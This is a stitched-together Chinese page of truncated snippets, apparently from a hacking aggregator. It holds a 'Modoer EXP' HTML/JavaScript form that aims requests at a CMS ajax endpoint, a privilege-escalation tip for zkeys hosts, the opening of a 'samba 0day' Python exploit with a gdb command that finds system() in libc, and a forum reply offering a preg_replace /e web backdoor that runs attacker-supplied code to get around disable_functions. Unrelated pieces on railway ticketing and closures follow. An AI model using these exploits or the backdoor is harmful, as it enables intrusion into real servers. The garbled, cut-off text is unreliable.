Modoer Exp

在线版: function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") Modoer EXP url: 源码: <html> <head> <title> Modoer EXP </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <script language="javascript"> function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http://" + url; } document.submit_url.action = url + "/item.php?act=ajax&op=get_membereffect&do=subject"; }else{ alert("Hello Hacker!!!"); } } </script> <body>

zkysoft 主机提权方法

zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。 提供我成功过的几个方法(不一定有效): 1、如果目标仅仅是旁站的话可

[Python] samba 0day

By: a guest  on Sep 24th, 2012  |  syntax: Python  |  size: 6.92 KB  |  hits: 3,930  |  expires: Never #!/usr/bin/python # # finding targets 4 31337z: # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1' # -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the

php的disabled function禁用成这个程度了,还有解么

disable_functions:phpinfo,passthru,system,chroot,scandir,chgrp,shell_exec,proc_open,proc_get_status,ini_after,ini_after,ini_restore,dl,pfsockopen,openlog,sysl,exec,chmod,file_put_contents 木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 10:09 preg_replace即可 <?php preg_replace("/test/e",$_GET["h"],"jutst test"); ?> xsjswt | 2012-09-24 10:23 @木易木兆 亲,不是执行php命令,是想执行系统命

12306 与“外包”的故事

【什么叫“外包”?】 国家拨1.9亿给铁道部做网络售票网站,铁道部用其中1000万找一个大型软件公司做,大型软件公司用其中500万找个小公司做

什么是闭包(Closure)?

这个问题是在最近一次英格兰Brighton ALT.NET Beers活动中提出来的。我发现,如果不用代码来演示,你很难单用话语把它解释清楚,所以,在这里,